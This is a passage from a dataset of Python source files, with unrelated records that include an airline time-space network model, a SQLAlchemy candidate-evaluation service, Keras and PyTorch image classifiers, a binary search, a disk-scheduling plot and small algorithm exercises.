f.departure == n_time -\n m_time and f.arrival < n_time)]\n if f:\n self._add_edge(n_name, n_data, n_time, m_name, m_data,\n m_time)\n\n def _add_edge(self, n_name, n_data, n_time, m_name, m_data, m_time):\n data = {\n 'origin': n_data['airport'],\n 'destination': m_data['airport'],\n 'departure': n_time,\n 'arrival': m_time,\n 'type': Flight._classify_flight(n_time, m_time)\n }\n self.G.add_edge(n_name,\n m_name,\n 
data=data,\n weight=self._edge_weight(n_name, m_name,\n {'data': data}))\n\n ################\n # Updating TSN #\n ################\n def _update_TSN(self, G, it, k_type, k_make, airline, duals, first_flight,\n drop_edges):\n \"\"\"\n Updates TSN network and returns preprocessed version,\n with less edges\n \"\"\"\n edges = G.edges(data=True)\n self.it = it\n self.k_make = k_make\n self.airline = airline\n self.duals = duals\n self.first_flight = first_flight\n\n list(map(self._update_edge_attrs, edges))\n if drop_edges:\n return self._drop_edges(G, k_type)\n else:\n return G\n\n @staticmethod\n def _drop_edges(G, k_type):\n \"\"\"\n Creates a copy of the TSN graph and removes\n unnecessary (Source, *) edges.\n \"\"\"\n G = copy.deepcopy(G)\n count, edges = 0, G.edges(data=True)\n number_edges = len(edges)\n edges_to_remove = []\n for edge in edges:\n edge_data = edge[2]\n i_airport = edge[0].split('_')[0]\n j_airport = edge[1].split('_')[0]\n if (\n (\n (\n (k_type == 1 and edge_data['data']['type'] > k_type)\n or (k_type == 2 and edge_data['data']['type'] != k_type)\n )\n and i_airport != j_airport\n )\n and i_airport != 'Source'\n and j_airport != 'Sink'\n ):\n edges_to_remove.append(edge[0:2])\n count += 1\n G.remove_edges_from(edges_to_remove)\n log.info('Removed {}/{} edges.'.format(count, number_edges))\n return G\n\n def _edge_weight(self, i, j, edge_data={}):\n \"\"\"\n Weight function for edge between two pair of nodes.\n\n Parameters\n ----------\n i : string,\n tail node in the form 'LETTER_INTEGER'\n\n j : string,\n head node in the form 'LETTER_INTEGER'\n\n Returns\n -------\n int\n value with appropriate weight\n \"\"\"\n if i == 'Source':\n return 0 # float(j.split('_')[1])\n elif j == 'Sink':\n return 0 # (self.last_arr - float(i.split('_')[1]))\n else:\n i_airport, i_time = i.split('_')\n j_airport, j_time = j.split('_')\n i_time, j_time = float(i_time), float(j_time)\n # if i_airport == j_airport:\n # return (j_time - i_time)\n # else:\n if self.k_make:\n try: # SCHEDULED CONNECTION\n flight_dual = list(\n w[0]\n for w in self.duals\n if w[1]._full_dict() == edge_data['data'])[0]\n cost = (OPERATING_COSTS[self.k_make]['standard']\n if i_airport != j_airport else 0)\n return cost * (j_time - i_time) - flight_dual\n except IndexError: # NON-SCHEDULED CONNECTION\n cost_delay, delay = 0, 0\n if i_airport != j_airport:\n closest_flight = self._get_flight_copy(\n self.flights, edge_data)\n delay = (edge_data['data']['departure'] -\n closest_flight.departure)\n flight_dual = list(w[0]\n for w in self.duals\n if w[1]._full_dict() ==\n closest_flight._full_dict())[0]\n cost = OPERATING_COSTS[self.k_make]['standard']\n cost_delay = OPERATING_COSTS[self.k_make]['copy']\n return (cost * (j_time - i_time) + cost_delay * delay -\n flight_dual)\n else:\n return (OPERATING_COSTS[self.k_make]['ground'] *\n (j_time - i_time))\n else:\n return 0\n\n @staticmethod\n def _get_flight_copy(flights, edge_data):\n previous_flights = [f for f in flights if (\n f._full_dict()['origin'] == edge_data['data']['origin'] and\n f._full_dict()['destination'] == edge_data['data']['destination']\n and f._full_dict()['departure'] < edge_data['data']['departure'])]\n if previous_flights:\n return max(previous_flights, key=lambda x: x.departure)\n else:\n return\n\n def _update_edge_attrs(self, edge):\n \"\"\"\n Update edge attributes using dual values from the solution of the\n relaxed master problem.\n\n Parameters\n ----------\n edge : edge\n edge to update.\n\n it : int\n iteration number.\n\n duals : 
list of tuples\n            (dual, classes.Flight). dual values from the master problem\n            and schedule.\n\n        first_flight : object, :class:`classes.Flight`\n            first flight scheduled.\n        \"\"\"\n\n        def __update_weight(edge):\n            edge_data = edge[2]\n            weight = self._edge_weight(*edge)\n            edge_data['weight'] = weight\n\n        def __update_res_cost(edge):\n            edge[2]['res_cost'] = np.zeros(self.G.graph['n_res'])\n\n        __update_weight(edge)\n        __update_res_cost(edge)\n","sub_path":"examples/cgar/time_space_network.py","file_name":"time_space_network.py","file_ext":"py","file_size_in_byte":13072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"396482737","text":"import re\nimport ast\nfrom setuptools import setup\nfrom helium.version import __version__\n\nwith open('README.rst') as file:\n    long_description = file.read()\n\nsetup(\n    name='helium-commander',\n    version=__version__,\n    url='http://github.com/helium/helium-commander/',\n    license='BSD',\n    author='Marc Nijdam',\n    author_email='marc@helium.com',\n    description='A CLI and service wrapper for the Helium API',\n    long_description=long_description,\n    packages=['helium', 'helium.commands'],\n    platforms='all',\n    install_requires=[\n        'future>=0.15',\n        'requests>=2.9',\n        'dpath>=1.4',\n        'futures>=3.0',\n        'terminaltables>=2.1.0',\n        'click>=6.6',\n        'unicodecsv>=0.14.1',\n    ],\n    classifiers=[\n        'Development Status :: 4 - Beta',\n        'Environment :: Web Environment',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: BSD License',\n        'Operating System :: OS Independent',\n        'Programming Language :: Python',\n        \"Topic :: Utilities\",\n        'Topic :: Software Development :: Libraries :: Python Modules'\n    ],\n    entry_points='''\n    [console_scripts]\n    helium=helium.cli:main\n    '''\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"170859654","text":"class Solution:\n    \"\"\"\n    @param nums: An integer array sorted in ascending order\n    @param target: An integer\n    @return: An integer\n    \"\"\"\n    def lastPosition(self, nums, target):\n        # write your code here\n        if nums is None or len(nums) == 0:\n            return -1\n        \n        # initialize the search boundaries\n        start, end = 0, len(nums) - 1\n        \n        # [1,1] target = 1\n        # start = 0, end = 1\n        # mid = (start + end) // 2 = 0\n        \n        #while start < end: # X\n        while start + 1 < end: \n            mid = (start + end)//2\n            if target >= nums[mid]:\n                start = mid # mid might be the last position\n            #elif target > mid:\n            #    start = mid\n            else:\n                end = mid\n        \n        if nums[end] == target:\n            return end\n        if nums[start] == target:\n            return start\n\n        return -1","sub_path":"binary_search/458l.py","file_name":"458l.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"543907835","text":"\"\"\"\nCreated on Nov 29, 2013\n\n@author: be07336\n\"\"\"\n\nfrom model.candidate import Candidate, Evaluation, Evaluator, Criterion, Ranking\nfrom model.connection import ConnectionManager\nimport utilities\n\n\nclass Service(object):\n\n    @staticmethod\n    def list_to_dict(key_function, values):\n        new_dict = dict((key_function(v), v) for v in values)\n        for i in range(1, 6):\n            if not new_dict.get(i):\n                new_eval = Evaluation()\n                new_eval.criterion = i\n                new_eval.grade = 0\n                new_dict.__setitem__(i, new_eval)\n        return new_dict\n\n    @staticmethod\n    def all_candidates():\n        session = ConnectionManager.get_instance().get_session()\n        result = session.query(Candidate).order_by(Candidate.id)\n        
session.close()\n return result\n\n @staticmethod\n def get_progress(evaluator_id=None):\n if not evaluator_id:\n return 0\n\n session = ConnectionManager.get_instance().get_session()\n evaluated = session.execute(\"\"\"\n SELECT COUNT(*) FROM candidate WHERE id IN (\n SELECT candidate FROM ranking WHERE ranking is not null AND ranking <> 999 AND evaluator=:evaluator_id)\"\"\",\n {'evaluator_id': evaluator_id}).fetchone()[0]\n total = session.execute(\"\"\"SELECT COUNT(*) FROM candidate\"\"\").fetchone()[0]\n return int(evaluated * 1.0 / total * 100)\n\n @staticmethod\n def get_candidate(candidate_id=None):\n if not candidate_id:\n raise ValueError(\"The id of the candidate cannot be null!\")\n session = ConnectionManager.get_instance().get_session()\n rows = session.query(Candidate).filter(Candidate.id == candidate_id)\n # session.close()\n print(rows)\n try:\n return rows[0]\n except:\n return None\n\n @staticmethod\n def get_evaluations(candidate_id=None, evaluator_id=None):\n if not candidate_id or not evaluator_id:\n raise ValueError(\"The id of the candidate or the id of the evaluator cannot be None!\")\n session = ConnectionManager.get_instance().get_session()\n rows = session.query(Evaluation) \\\n .filter(Evaluation.candidate == candidate_id, Evaluation.evaluator == evaluator_id) \\\n .order_by(Evaluation.criterion)\n rows_dictionary = Service.list_to_dict(lambda evaluation: evaluation.criterion, rows)\n session.close()\n return rows_dictionary\n\n @staticmethod\n def save_evaluations(evaluations=None):\n if not evaluations or not isinstance(evaluations, list):\n return\n\n session = ConnectionManager.get_instance().create_session()\n for evaluation in evaluations:\n session.merge(evaluation)\n try:\n session.commit()\n print('Commited!')\n except:\n print('Exception!!!!')\n session.rollback()\n raise\n finally:\n session.close()\n\n @staticmethod\n def save_ranking(ranking=None):\n if not ranking:\n return\n session = ConnectionManager.get_instance().create_session()\n session.merge(ranking)\n try:\n print('Ranking:', ranking.ranking, 'evaluator', ranking.evaluator, 'candidate', ranking.candidate)\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n\n @staticmethod\n def report_for_candidate(candidate_id=None):\n if not candidate_id:\n raise ValueError(\"Cannot generate a report for a non-defined user...\")\n # TODO: complete and returns a report for the candidate\n return 1\n\n @staticmethod\n def get_evaluator(evaluator_password=None, evaluator_email=None):\n if not evaluator_email:\n raise ValueError(\"Email is required to perform search\")\n session = ConnectionManager.get_instance().get_session()\n rows = session.query(Evaluator).filter(Evaluator.email == evaluator_email,\n Evaluator.password == evaluator_password)\n\n session.close()\n try:\n return rows[0]\n except:\n return None\n\n @staticmethod\n def get_ranking(evaluator_id=None, candidate_id=None):\n if not evaluator_id or not candidate_id:\n raise ValueError\n session = ConnectionManager.get_instance().get_session()\n rows = session.query(Ranking).filter(Ranking.evaluator == evaluator_id, Ranking.candidate == candidate_id)\n try:\n return rows[0]\n except:\n return 999\n\n @staticmethod\n def get_user(user_email):\n if not user_email:\n return None\n session = ConnectionManager.get_instance().get_session()\n rows = session.query(Evaluator).filter(Evaluator.email == user_email)\n # session.close()\n try:\n return rows[0]\n except:\n return None\n\n @staticmethod\n def 
get_criteria():\n        return ConnectionManager.get_instance().get_session().query(Criterion).order_by(Criterion.id).all()\n\n    @staticmethod\n    def get_missing_evaluators():\n        session = ConnectionManager.get_instance().get_session()\n        rows = session.execute(\"\"\"\n            SELECT name, email FROM evaluator WHERE id NOT IN (\n                SELECT evaluator\n                FROM ranking\n                WHERE ranking is not null AND ranking <> 999\n                GROUP BY evaluator\n                HAVING COUNT(ranking) >= 12) AND id <> 0 \"\"\")\n        result_list = []\n        for row in rows:\n            result_list.append(dict(row))\n        return result_list\n\n    @staticmethod\n    def get_ranking_result():\n        session = ConnectionManager.get_instance().get_session()\n        rows = session.execute(\"\"\"\n            SELECT c.name AS NAME, SUM(13 - r.ranking) AS RANKINGSUM, AVG(r.ranking) AS AVERAGERANKING,\n                COUNT(r.ranking) AS COUNTRANKING\n            FROM ranking r JOIN candidate c ON c.id = r.candidate\n            WHERE ranking is not null AND ranking <> 999\n            GROUP BY c.name\n            ORDER BY RANKINGSUM DESC\n            \"\"\")\n        result_list = []\n        for row in rows:\n            result_list.append(dict(row))\n        return result_list\n\n    @staticmethod\n    def get_criteria_average():\n        session = ConnectionManager.get_instance().get_session()\n        rows = session.execute(\"\"\"\n            SELECT c.id, c.name, e.criterion, round(avg(e.grade),3) AS AVERAGE\n            FROM evaluation e JOIN candidate c ON c.id=e.candidate\n            GROUP BY c.id, c.name, e.criterion\n            ORDER BY c.id, e.criterion\n            \"\"\")\n        result_list = utilities.result_set_to_dict(rows)\n        result_map = dict()\n        for a_dict in result_list:\n            if not a_dict['NAME'] in result_map:\n                result_map.update({a_dict['NAME']: {a_dict['CRITERION']: a_dict['AVERAGE']}})\n            else:\n                result_map[a_dict['NAME']].update({a_dict['CRITERION']: a_dict['AVERAGE']})\n        return result_map\n\n    @staticmethod\n    def get_system_ranking():\n        session = ConnectionManager.get_instance().get_session()\n        rows = session.execute(\"\"\"\n            SELECT SUM(ponderation) AS RANKING, ID, NAME\n            FROM (\n                SELECT candidate AS ID, c.name AS NAME, crit.weight/100.0 * AVG(grade) as ponderation\n                FROM evaluation e JOIN candidate c ON c.id = candidate JOIN criterion crit ON crit.id = e.criterion\n                GROUP BY criterion, candidate, crit.weight\n            )\n            GROUP BY ID, NAME\n            ORDER BY RANKING DESC\n            \"\"\")\n        return utilities.result_set_to_dict(rows)\n","sub_path":"src/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":7788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"76832084","text":"from pandas import read_csv\r\nfrom os import path\r\n\r\n\r\ndef vehicle_fetch(csv_filename):\r\n    assert path.splitext(csv_filename)[1][1:] in ('csv', 'ascii'), 'function takes a name of csv file'\r\n    reader = read_csv(csv_filename, sep=';')\r\n    car_params = {}\r\n    names = reader.columns.tolist()\r\n    for _ in names:\r\n        car_params[_] = list(reader[_])\r\n    return car_params\r\n\r\n# print(vehicle_fetch('car_table.csv'))\r\n","sub_path":"vehicle/resources/csvreader.py","file_name":"csvreader.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18064472","text":"import os\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nfrom cnn_utils import train_test_split\n\nsrc = 'Dataset/PetImages/'\n\n# Check that the dataset has been downloaded\nif not os.path.isdir(src):\n    print(\"\"\"Dataset not present on this computer.\"\"\")\n    quit()\n\n# Create the Train and Test folders if they do not exist\nif not os.path.isdir(src+'train/'):\n    train_test_split(src)\n\nfrom 
keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras.preprocessing.image import ImageDataGenerator\n\n# Definition of HYPERPARAMETERS\nFILTER_SIZE = 3 # size of the convolution filter (3x3 here)\nNUM_FILTERS = 32 # number of filters used\nINPUT_SIZE = 32 # number of pixels the image is resized to (32x32 here); some information is lost but overall performance improves\nMAXPOOL_SIZE = 2 # max pooling size (2x2 here, halves the input of the previous layer)\nBATCH_SIZE = 16 # number of training samples per mini batch during gradient descent. Larger values improve accuracy but also increase training time\nSTEPS_PER_EPOCH = 20000//BATCH_SIZE # number of iterations per training epoch\nEPOCHS = 10 # number of epochs to train on the data\n\n# create the sequential model\nmodel = Sequential()\n\n# add the first convolutional layer\nmodel.add(Conv2D(NUM_FILTERS, (FILTER_SIZE, FILTER_SIZE), input_shape = (INPUT_SIZE, INPUT_SIZE, 3), activation = 'relu')) # 'relu' selects ReLU as the activation function\n# add the first max pooling layer\nmodel.add(MaxPooling2D(pool_size = (MAXPOOL_SIZE, MAXPOOL_SIZE)))\n\n# add the second convolutional layer\nmodel.add(Conv2D(NUM_FILTERS, (FILTER_SIZE, FILTER_SIZE), activation = 'relu'))\n# add the second max pooling layer\nmodel.add(MaxPooling2D(pool_size = (MAXPOOL_SIZE, MAXPOOL_SIZE)))\n\nmodel.add(Flatten()) # flattens a multidimensional tensor into a one-dimensional vector\n# add the first fully connected layer\nmodel.add(Dense(units = 128, activation = 'relu')) # 128 units with ReLU activation\n\n# add the dropout layer\nmodel.add(Dropout(0.5))\n# add the second fully connected layer\nmodel.add(Dense(units = 1, activation = 'sigmoid')) # a single unit; 'sigmoid' selects the sigmoid activation function\n\n# compile the model\nmodel.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\ntraining_data_generator = ImageDataGenerator(rescale = 1./255)\ntesting_data_generator = ImageDataGenerator(rescale = 1./255)\n\n# training on the /Train folder\ntraining_set = training_data_generator.flow_from_directory(src+'Train/',\n                                                target_size = (INPUT_SIZE, INPUT_SIZE),\n                                                batch_size = BATCH_SIZE,\n                                                class_mode = 'binary')\n# testing on the /Test folder\ntest_set = testing_data_generator.flow_from_directory(src+'Test/',\n                                             target_size = (INPUT_SIZE, INPUT_SIZE),\n                                             batch_size = BATCH_SIZE,\n                                             class_mode = 'binary')\n\nmodel.fit_generator(training_set, steps_per_epoch = STEPS_PER_EPOCH, epochs = EPOCHS, verbose=1)\n\nscore = model.evaluate_generator(test_set, steps=100)\n\nfor idx, metric in enumerate(model.metrics_names):\n    print(\"{}: {}\".format(metric, score[idx]))\n","sub_path":"main_basic_cnn.py","file_name":"main_basic_cnn.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"567134878","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.utils.data as Data\nimport torchvision\n# import sys\n# import os\n#\n# # sys.path.append(os.path.curdir)\n\n\nclass CNN(nn.Module):\n    def __init__(self):\n        super(CNN, self).__init__()\n        self.conv1 = nn.Sequential(\n            nn.Conv2d(\n                
in_channels=1,\n out_channels=16,\n kernel_size=5,\n padding=2, # if stride=1, padding=(kernel_size - 1) /2 = (5 -1)/2\n ), # -> (16, 28, 28)\n nn.ReLU(), # -> (16, 28, 28)\n nn.MaxPool2d(kernel_size=2), # -> (16, 14, 14)\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(16, 32, 5, 1, 2), # -> (32, 14, 14)\n nn.ReLU(), # -> (32, 14, 14)\n nn.MaxPool2d(2) # -> (32, 7, 7)\n )\n self.out = nn.Linear(32 * 7 * 7, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x) # (batch, 32, 7, 7)\n x = x.view(x.size(0), -1) # (batch, 32 * 7 * 7)\n output = self.out(x)\n return output\n\n\ndef test():\n test_data = torchvision.datasets.MNIST(root='../mnist/', train=False)\n # shape from (2000, 28,28) to (2000, 1, 28,28), value in range(0, 1)\n test_x = Variable(torch.unsqueeze(test_data.data, dim=1)).type(torch.FloatTensor)[0] / 255.\n test_x1 = Variable(torch.unsqueeze(test_data.data, dim=1))[0]\n print(\"test_x1:\", test_x1)\n print(\"test_x1.shape:\", test_x1.shape)\n\n\ndef get_test_x():\n test_data = torchvision.datasets.MNIST(root='../mnist/', train=False)\n # shape from (2000, 28,28) to (2000, 1, 28,28), value in range(0, 1)\n var = Variable(torch.unsqueeze(test_data.data, dim=1)).type(torch.FloatTensor)[:10] / 255.\n return var\n\n\ndef train_net():\n # Hyper Parameters\n EPOCH = 1\n BATCH_SIZE = 50\n LR = 0.001\n DOWNLOAD_MNIST = False\n train_data = torchvision.datasets.MNIST(\n root='../mnist',\n train=True,\n transform=torchvision.transforms.ToTensor(), # (0, 1) (0-255)\n download=DOWNLOAD_MNIST\n )\n\n train_loader = Data.DataLoader(dataset=train_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=2)\n\n test_data = torchvision.datasets.MNIST(root='../mnist/', train=False)\n # shape from (2000, 28,28) to (2000, 1, 28,28), value in range(0, 1)\n test_x = Variable(torch.unsqueeze(test_data.test_data, dim=1), volatile=True).type(torch.FloatTensor)[:2000] / 255.\n test_y = test_data.test_labels[:2000]\n\n cnn = CNN()\n optimizer = torch.optim.Adam(cnn.parameters(), lr=LR)\n loss_func = nn.CrossEntropyLoss()\n\n for epoch in range(EPOCH):\n for step, (x, y) in enumerate(train_loader):\n # b_x = Variable(x)\n # b_y =\n output = cnn(x)\n loss = loss_func(output, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if step % 50 == 0:\n test_output = cnn(test_x)\n pred_y = torch.max(test_output, 1)[1].data.squeeze()\n accuracy = sum(pred_y == test_y) / test_y.size(0)\n # accuracy = float((pred_y == test_y.data.numpy()).astype(int).sum())/ float(test_y.size(0))\n # print('training pred_y', pred_y, ' sum of matches: ',\n # float((pred_y == test_y.data.numpy()).astype(int).sum()))\n # print('training test_y', test_y, 'test_y.size(0)', test_y.size(0))\n\n print('Epoch: ', epoch, '| train loss: %.4f' % loss.data.numpy(), '| test accuracy: %.2f' % accuracy)\n\n test_output = cnn(test_x[:10])\n pred_y = torch.max(test_output, 1)[1].data.numpy().squeeze()\n torch.save(cnn, \"cnn.pkl\")\n torch.save(cnn.state_dict(), \"cnn_params.pkl\")\n print(pred_y, 'prediction number')\n print(test_y[:10].numpy(), 'real number')\n","sub_path":"hand_writing/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"413416775","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport matplotlib.pyplot as plt,time\nimport numpy as np\n\n# 绘制普通图像\nscan=[]\n\n\nwith open(r\"SCAN.txt\",\"r\") as f2:\n data2=f2.readlines()\n\nfor line in 
data2:\n    scan.append(int(line.split()[0]))\n# X-axis, Y-axis data\n#plt.figure(figsize=(10,6)) # create the figure object\nfor i in range(12):\n    \n    plt.ion()\n    plt.clf()\n   # X, =plt.plot(sstf[:i+1],list(range(1, len(sstf[:i+1]) + 1)),\"b*-\",linewidth=1) # plot on the current figure (x data, y data, line style, line width)\n    X=plt.plot(scan[:i+1],list(range(1, len(scan[:i+1]) + 1)),\"ro-\",linewidth=1)\n    \n    #time.sleep(1)\n    plt.xlabel(\"disk_sequence\") # x-axis label\n    plt.ylabel(\"time\") # y-axis label\n    plt.title(\"disk_schedule\",fontsize='large',fontweight='bold',color='blue') # figure title\n    plt.legend(X, ['scan'])\n#    plt.legend([X, Y], ['sstf', 'scan'])\n    plt.pause(0.5)\n   # plt.figure()\n#    plt.show()  # show the figure\n    plt.ioff()\n    ","sub_path":"4.磁盘调度算法/SCAN.py","file_name":"SCAN.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"536184737","text":"import numpy as np\nimport matplotlib.pylab as plt\n\nnames = ['Taxi', 'UberX', 'Drive & Park', 'Car2Go (if I could park it!)', 'Bus & Rail']\ncosts = [71, 42, 37, 12, 5.5]\ntimes = [40,40,40,30,78]\nptcolors = ['yellow', 'black', 'red', 'blue', 'green']\n\nxoffs = [-20,-20,90,90,-20]\nyoffs = [0,0,0,-30,0]\n\nfig = plt.figure()\nax=fig.add_subplot(111)\nfor x,y,c in zip(times, costs,ptcolors):\n    ax.plot(x,y,color=c, marker='o', markersize=12)\nax.set_xlabel('Time (minutes)')\nax.set_ylabel('Cost ($)')\nax.set_title('Getting To the Airport')\nax.set_xlim([20,80])\n\nfor label,x,y,c,xoff,yoff in zip(names,times,costs, ptcolors,xoffs,yoffs):\n    ax.annotate(label, xy=(x,y), xytext=(xoff,yoff),\n        textcoords = 'offset points', ha = 'right', va = 'bottom',\n        bbox = dict(boxstyle = 'round,pad=0.5', fc = c, alpha = 0.1)\n        )\n\n\n\nplt.savefig('options.png')\n#plt.show()\n","sub_path":"blargh/Posts/Ride2Airport/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"511832811","text":"def getaction():\n    laction = []\n    while True:\n        laction.append(str(input('Action (Boost|Dodge|Focus|Roll|Target): ')))\n        vbreak = input(str('Is it the end of actions (s/n) ? '))\n        print('')\n        if vbreak == 's' or vbreak == 'S':\n            break\n    return laction\n\n\ndef getimprovement():\n    limprovement = []\n    while True:\n        limprovement.append(str(input('Improvement (Elite Pilot|Torpedos|Astromech): ')))\n        vbreak = input(str('Is it the end of improvements (s/n) ? '))\n        print('')\n        if vbreak == 's' or vbreak == 'S':\n            break\n    return limprovement\n\n\ndef getpilot():\n    vname = str(input('Name: '))\n    vskillpoint = int(input('Skill: '))\n    vattackdice = int(input('Attack: '))\n    vdefensedice = int(input('Defense: '))\n    vhull = int(input('Hull: '))\n    vshield = int(input('Shield: '))\n    laction = getaction()\n    limprovement = getimprovement()\n    vtotalpoints = int(input('Total points: '))\n    dpilot = {'name': vname, 'skill': vskillpoint, 'attack': vattackdice, 'defense': vdefensedice, 'hull': vhull,\n              'shield': vshield, 'action': laction, 'improvement': limprovement, 'points': vtotalpoints}\n    return dpilot\n\ndef getsquadron(vclass):\n    lsquadron = []\n    while True:\n        lsquadron.append(getpilot())\n        vbreak = input(str('Is it the end of pilots (s/n) ? 
'))\n print('')\n if vbreak == 's' or vbreak == 'S':\n break\n return lsquadron\n\n\nlsquad1 = getsquadron('Rebel')\nlsquad2 = getsquadron('Imperial')\n\nprint(lsquad1)\nprint(lsquad2)","sub_path":"Genericos/x-wing.py","file_name":"x-wing.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"96373536","text":"'''\nCreated on 27 Mar 2014\n\n@author: vnicolao\n'''\nimport unittest\nfrom os import path\n\nfrom comp61542.database.database import Publication, Database, Author\n\nfrom comp61542.statistics import utils\nimport comp61542\n\nclass TestAuthorStats(unittest.TestCase):\n\n def setUp(self):\n directory, _ = path.split(__file__)\n data = \"dblp_curated_sample.xml\"\n comp61542.app.config['TESTING'] = True\n comp61542.app.config['DATASET'] = data\n db = Database()\n db.read(path.join(directory, \"..\", \"data\", data))\n comp61542.app.config['DATABASE'] = db\n \n self.app = comp61542.app.test_client()\n self.db = db\n\n def test_that_db_calculates_number_of_publications_for_authors(self):\n self.db.calculate(\"Roberto Elli\")\n author = self.db.getAuthor(\"Roberto Elli\")\n self.assertEquals(author.conference_papers, 1)\n self.assertEquals(0, author.journal_papers)\n self.assertEquals(0, author.book_chapters)\n self.assertEquals(0, author.books)\n self.assertEquals(1, author.total_papers())\n\n self.db.calculate(\"Alon Y. Halevy\")\n author = self.db.getAuthor(\"Alon Y. Halevy\")\n self.assertEqual(72, author.conference_papers)\n self.assertEqual(4, author.book_chapters)\n self.assertEqual(62, author.journal_papers)\n self.assertEqual(1, author.books)\n self.assertEquals(139, author.total_papers())\n\n\n def test_that_db_calculates_number_of_publications_for_authors_as_first_author(self):\n self.db.calculate(\"Alon Y. Halevy\")\n author = self.db.getAuthor(\"Alon Y. Halevy\")\n PublicationType = [\n \"Conference Paper\", \"Journal\", \"Book\", \"Book Chapter\"]\n self.assertEqual(8, author.first[PublicationType[0]])\n self.assertEqual(0, author.first[PublicationType[3]])\n self.assertEqual(6, author.first[PublicationType[1]])\n self.assertEqual(0, author.first[PublicationType[2]])\n self.assertEqual(14, author.first[\"overall\"])\n\n def test_that_db_calculates_number_of_publications_for_authors_as_last_author(self):\n self.db.calculate(\"Alon Y. Halevy\")\n author = self.db.getAuthor(\"Alon Y. Halevy\")\n PublicationType = [\n \"Conference Paper\", \"Journal\", \"Book\", \"Book Chapter\"]\n self.assertEqual(25, author.last[PublicationType[0]])\n self.assertEqual(2, author.last[PublicationType[3]])\n self.assertEqual(18, author.last[PublicationType[1]])\n self.assertEqual(0, author.last[PublicationType[2]])\n self.assertEqual(45, author.last[\"overall\"])\n \n def test_that_db_calculates_number_of_publications_for_authors_as_sole_author(self):\n self.db.calculate(\"Alon Y. Halevy\")\n author = self.db.getAuthor(\"Alon Y. Halevy\")\n PublicationType = [\n \"Conference Paper\", \"Journal\", \"Book\", \"Book Chapter\"]\n self.assertEqual(10, author.sole[PublicationType[0]])\n self.assertEqual(2, author.sole[PublicationType[3]])\n self.assertEqual(7, author.sole[PublicationType[1]])\n self.assertEqual(0, author.sole[PublicationType[2]])\n self.assertEqual(19, author.sole[\"overall\"])\n \n def test_that_db_calculates_number_of_coauthors_for_author(self):\n self.db.calculate(\"Alon Y. Halevy\")\n author = self.db.getAuthor(\"Alon Y. 
Halevy\")\n self.assertEquals(195, author.coauthors)\n \nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.test_that_']\n unittest.main()","sub_path":"test/test_calculating_stats.py","file_name":"test_calculating_stats.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"129027108","text":"'''\n=> Modified Quick Sort\nNotice the special modification we have on line 29, we want a strict distribution that all the color that is smaller than or equal to pivot will appear on left, otherwise right.\nThis way we will not have dead loop\nTime: O(nlogk)\nSpace: O(logk)\n'''\nclass Solution:\n \"\"\"\n @param colors: A list of integer\n @param k: An integer\n @return: nothing\n \"\"\"\n def sortColors2(self, colors, k):\n # write your code here\n self.quick_sort(colors, 0, len(colors) - 1, 1, k)\n \n def quick_sort(self, colors, start, end, colorFrom, colorTo):\n if colorFrom >= colorTo:\n return\n \n if start >= end:\n return\n \n pivot = colorFrom + (colorTo - colorFrom) // 2\n \n l, r = start, end\n while l <= r:\n while l <= r and colors[l] <= pivot:\n l += 1\n while l <= r and colors[r] > pivot:\n r -= 1\n \n if l <= r:\n colors[l], colors[r] = colors[r], colors[l]\n l += 1\n r -= 1\n \n self.quick_sort(colors, start, r, colorFrom, pivot)\n self.quick_sort(colors, l, end, pivot + 1, colorTo)\n\n\n\n ","sub_path":"143_sort-colors-2/sort-colors-2.py","file_name":"sort-colors-2.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"564437042","text":"import math\n\n\ndef main():\n A, B, H, M = map(int, input().split())\n PI = math.pi\n\n # Hour\n h_deg = 360 - 360 * (H + M / 60) / 12 + 90.0\n h_rad = h_deg * PI / 180.0\n # print(h_deg)\n h_x, h_y = A * math.cos(h_rad), A * math.sin(h_rad)\n # print(h_x, h_y)\n\n # Minute\n m_deg = 360 - 360 * (M / 60) + 90.0\n m_rad = m_deg * PI / 180.0\n # print(m_deg)\n m_x, m_y = B * math.cos(m_rad), B * 